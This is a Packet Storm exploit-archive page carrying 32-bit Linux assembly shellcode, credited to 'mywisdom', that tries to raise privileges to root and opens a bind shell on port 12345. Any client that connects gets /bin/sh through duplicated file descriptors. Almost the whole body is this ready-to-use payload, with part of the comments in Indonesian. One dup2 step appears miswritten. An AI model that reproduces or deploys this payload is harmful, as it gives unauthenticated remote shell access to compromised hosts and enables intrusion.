what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Assembly Port Binding Code

Assembly Port Binding Code
Posted Feb 25, 2010
Authored by mywisdom

Assembly code that binds to port 12345.

tags | shellcode
SHA-256 | 3b81b5eab10bc8cb8b3503424ac364d82d833f0afa4ccc82097c78cc6c06910f

Assembly Port Binding Code

Change Mirror Download
;devilzc0de port bind shell @port 12345 
;c0d3r: mywisdom (http://web.archive.org/web/*/http://solhack.ath.cx)
;special thanks: gunslinger_, flyv666,kiddies,petimati,devil nongkong,whitehat,marco poppies,v3n0m,c0mrade, and all my friend

global _start

_start:

push byte 2
pop eax
int 80h
jmp soket

setresuid:
BITS 32
xor eax, eax ;reset eax
xor ebx, ebx
xor ecx, ecx
cdq
mov BYTE al, 0xa4
int 80h

setreuid:
mov ebx, eax
mov ecx, eax
push byte 70
pop eax
int 80h

soket:
push byte 0 ; simpan 0 ke stak
push byte 1 ; simpan 1 ke stak
push byte 2 ; simpan 2 ke stak

mov eax, 102 ;syscall nomor 102 register ax
mov ebx, 1
mov ecx, esp ; pointer ke stak
int 80h

mov edx, eax

binder:

;simpan semua argumen yang diperlukan ke stack

push byte 0
push byte 0
push byte 0
push word 0x3930
push word 2
mov ebx, esp

push byte 16
push ebx
push edx

mov eax,102 ;persiapan socket call
mov ebx,2
mov ecx,esp
int 80h

lisen:
push byte 0x1
push edx
mov eax,102
mov ebx,4
mov ecx,esp
int 80h

acep:
push byte 0
push byte 0
push edx
mov eax,102
mov ebx,5
mov ecx,esp
int 80h

mov edx, eax

siap_fd:
mov eax,63
mov ebx,edx
mov ebx,2
int 80h

mov eax,63
mov ebx,edx
mov ecx,1
int 80h

mov eax,63
mov ebx,edx
mov ecx,0
int 80h

eksekusi:

push BYTE 11
pop eax
push ecx
push 0x68732f2f
push 0x6e69622f
mov ebx, esp
push ecx
mov edx, esp
push ebx
mov ecx, esp
int 80h

bersih2:
push byte 0x06
pop eax
int 80h

keluar:
push byte 0x01
pop eax
int 80h

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close